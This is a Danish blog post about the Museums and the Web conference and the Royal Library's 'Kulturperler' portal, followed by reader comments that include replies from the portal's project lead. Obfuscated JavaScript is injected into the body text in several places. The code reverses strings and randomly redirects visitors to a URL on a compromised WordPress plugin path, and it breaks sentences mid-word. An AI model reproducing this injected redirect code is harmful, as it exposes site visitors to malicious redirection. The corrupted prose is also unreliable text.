Hey Danmark!

Museums and the web er en helt elektrisk forsamling af hele spektret af museumsfolk – teknikere, akademikere, administratoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torer og designere; studerende og professionelle som var med til at etablere koblingen mellem web og museum. Selvom vi hver især har vore kæpheste og særlige interesseområder kommer vi først og fremmest for at lære af hinanden, og snakken går livligt mellem sessionerne. Det er en helt utrolig ressource af praktiske erfaringer, visioner og reflektioner, som heldigvis også er åben for andre i kraft af at hele kataloget af papers ligger frit tilgængeligt på nettet. Men online findes ikke den meningsudveksling og sparring som sker på konferencen.

Amerikanerne er naturligvis i overtal, mens også Canada, Australien og New Zealand er godt repræsenteret. Fra Europa kommer især mange englændere, men i år var der også hele 29 repræsentanter fra en lang række institutioner i Holland.
Gang på gang blev jeg spurgt, hvorfor der ikke var andre danskere, og jeg vil gerne stille spørgsmålet videre. Er det (pludselige?) besparelser som gør, at de danske museer ikke har råd til, eller ikke prioriterer, at sende repæsentanter? Er det mangel på innovation der gør at vi ikke har noget at præsentere? Har tidligere års deltagelse ikke levet op til forventningerne? Eller mener vi at have nok i os selv og vore nationale og nordiske netværk?

Mens jeg sad på konferencen kunne jeg læse at Politiken – og Det Kongelige Bibliotek selv – præsenterede den nysåbnede portal ‘Kulturperler’ som intet mindre end en verdensnyhed. Jeg må indrømme, at mit hjerte sank. Her havde jeg netoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top hørt om det fantastiske og ambitiøse finske forskningsprojekt ‘CultureSampo’ som gør kulturarven tilgængelig gennem det semantiske web – om hollandske ‘$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toekomst.nl/en”>Images for the Future’ som inviterer offentligheden til at annotere og skabe metadata i et fælles multimedialt arkiv gennem spil og leg – om ‘Digital NZ’ som ikke alene samler den digitaliserede new zealandske kulturarv men også giver råd og reskaber til hvordan man kan bruge materialet gennem widgets, remixing og skræddersyede søgemaskiner der kan embeddes i egne webapplikationer.

Jeg synes også, at det er skønt, at vi i Danmark får digitaliseret kulturarven og samler og gør den tilgængelig online. Jeg må indrømme, at jeg har svært ved at forstå hvorfor man har valgt en lineær ‘web 1.0’ model for portalen, der end ikke tilbyder et søgefelt (er det brugervenligt? er det inspirerende?) men jeg kender ikke til baggrunden og mit ærinde her er ikke at nedgøre det stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tore arbejde, KB har gjort. Men når portalen præsenteres som enestående i verden synes jeg det lyder som om vi trænger til at få skyklapperne af og komme længere frem i skoene. Vi kan nu hiige og søge i gamle bøger – men vi er ikke ene om at dyrke kulturperler. Der er masser af inspiration at hente og erfaringer at trække på ude i verden, ikke bare på MW men på hele WWW. Så hvem skal med til Denver i 2010?

Crossposted på Musings

9 comments to “Hey Danmark!”
 1. Hej Bernhard,

  Jo, jeg ved godt at der også sker en masse innovative ting i Danmark (som du kan se har jeg tagget indlægget ‘polemik’ og sat det lidt på spidsen)
  – men jeg kendte ikke til Absalon, det lyder meget spændende og jeg glæder mig til at læse nærmere – tak for linket!

 2. Pingback: Hey Danmark! « Musings

 3. Hej Rikke,

  Stor tak for din liveblogging – det er superfedt, når folk der er ude til de store konferencer har mulighed for at at skrive lidt hjem til os andre.

  Enormt spændende med både de projekter – men også nogle de services du omtaler. Jeg kendte fx ikke blurp.

  Jeg kan godt give dig ret i at KB´s kulturperler måske kan virke lidt 1.0-agtig, men mon ikke en del af problemstillingen bl.a. er, at en samsøgning fordrer meget mere fælles fodslag mht. standarder m.m. i tilgængeliggørelsen?

  bedste hilsner
  Charlotte SHJ

  PS: Ja, det bliver spændende at se det nye Absalon – det fremgår ikke af ovenstående, men det er vist Bernhards Snizeks eget firma, der laver Heritage 4 (som kører på Plone eller er en slags ekstension til Plone?)

 4. En fjer blev til fem høns …

  Må jeg som projektansvarlig for KulturPerler bidrage til afmystificering af nogle spørgsmål, som stilles i forbindelse med den nyåbnede portal.

  Ad ”verdensnyheden”: Baggrunden er denne: I efteråret 2008 skrev direktør Erland Kolding Nielsen en artikel til Danmarks biblioteker om den kommende portal, som på det tidspunkt endnu ikke havde fået noget navn. Her anføres: ”Det er os bekendt den første af sin art internationalt set, og konceptet har allerede vakt interesse i udlandet”.

  I KulturPerlers baggrundsartikel finder man oplysningen: ”Den er formentlig den første af sin art, internationalt set”.

  Pressemeddelelsen fra Det Kongelige Bibliotek afsluttes med den samme oplysning, men her er ”formentlig” røget ud.

  I Politikens netavis bliver det så udråbt som en verdensnyhed, som sprænger proportionerne en hel del. Når vi anfører, at det os bekendt er den første af sin art, er det nok også en smule forenklet udtrykt, for selvfølgelig samler man også digitaliseret kulturarv på forskellig vis i andre lande.

  Men det der er tænkt på, er opbygningen: At man institution for institution kan følge med i digitaliseringsindsatsen, og at en central redaktion (KB) udarbejder/redigerer beskrivelser samt indhenter en række faktuelle data, at disse data optimalt set skal indeholde oplysninger om den fysiske samlings størrelse såvel som omfanget af digitaliseringsindsatsen p.t. (se f.eks. Thorvaldsens Museums samlinger).

  Portalens tilblivelseshistorie hænger sammen med Kulturministeriets rapport om digitalisering af kulturarven, som lanceres i næste uge, d. 30. april. I forbindelse med udarbejdelsen af rapporten fik man ideen til at skabe en portal, som kunne give et overblik over digitaliseringssituationen i landet. Den har altså ikke i første omgang været tænkt som et avanceret søgeredskab.

  Men det er bestemt mit håb, at den på et senere tidspunkt, i næste version, kan få lov at udvikle sig med mulighed for bedre søgefaciliteter.

 5. Hej Mikala,

  mange tak for din kommentar. Det var rigtig fint at få lidt baggrund både på hvordan portalen var tænkt og hvordan kommunikationen omkring den åbenbart var løbet lettere løbsk.
  Jeg glæder mig også til at følge udviklingen af portalen; jeg tror bestemt at der ligger en masse spændende muligheder for at søge i og bruge den digitaliserede kulturarv i en sådan fælles samling.

 6. Til orientering.

  I anledning af debatten, startet af Rikke Baggesen, vil jeg gerne sætte et perspektiv på, for inden for sit sigte og afgrænsning er > kulturperler.kb.dk bibliotek.dk < for slet ikke at nævne Google eller andre søgemaskiner, med mindre man søgte på navn eller lign. Overblik – hverken tilfældigt eller systematisk – kunne ikke skabes ad nogen af disse to hovedveje. Det Kongelige Bibliotek har i realiteten sørget for, at alle andre institutioners (m.fl.) retrodigitaliseringer nu er synlige og søgbare i de tre nævnte sammenhænge, idet webkatalogiseringen er gjor på en sådan måde, at også Google vil fange de enkelte “landing pages” herefter.

  At skabe en søgeindgang (søgemaskine) på “enkeltdokumentniveau” har ikke været hensigten – og er totalt umuligt på nuværende katalogiserings/ registreringsniveau – da de fleste institutioner uden for biblioteksvæsenet ikke har registreret deres dokumenter på nettet med henblik herpå, således som også Charlotte S.H. Jensen er inde på.

  Derfor er enhver tanke om at tænke portalen ind i en web 2.0 eller endnu mere avanceret sammenhæng omsonst. Omkostninger vil Det Kongelige Bibliotek dels ikke have mulighed for at afholde – måske Kulturarvsstyrelsen, da problemet primært ligger i museumsvæsenet ? – dels vil det næppe være rimeligt, førend standardiseringsproblemet konkret er løst.

  Projektet er således heller ikke et “forskningsprojekt”, d.v.s. heller ikke begrænset til en bestemt, afgrænset, ev.t mindre problemstilling, men en totaloversigt over et hidtil delvist usynligt område, som også har det politiske formål at giver alle, der ønsker at vide det -uanset tilgang – et overblik over, hvor lidt eller meget Danmark har gjort på området.

  Portalen er på et vist niveau interaktiv, men selvfølgelig ikke for eller i relation til den enkelte “slutbruger”. De er nu op til de institutioner, der retrodigitaliserer, at gøre sig synlige fremover ved at indbrette eller selvangive gennem formularen på portalsiden. At lade brugerne “tagge” på den, er meningsløst. Det er noget, de enkelte institutioner skal arbejde med i relation til deres egne digitaliseringer på enkeltsdokumentsniveau, sålede som KB og enkelte museer allerede er begyndt på.

  Jeg kan oplyse, at man regner med, at ca. halvdelen af, hvad der er retrodigitaliseret i England siden midten af 1990.erne, er forsvundet fra nettet igen – bl.a. men naturligvis ikke udelukkende- fordi det ikke var synligt og derfor ofte i praksis utilgængeligt.

  Det Kongelige Bibliotek har da også “opdaget” og tilgængeliggjort en masse, som var totalt “ukendt” for os tidligere !

  Så alt i alt er portalen indtil videre enestående. Der findes i hvert fald ikke en parallel i Europa. New Zealand er nok den, der kommer nærmest, men den faktisk startet senere.

  Med venlig hilsen

Skriv et svar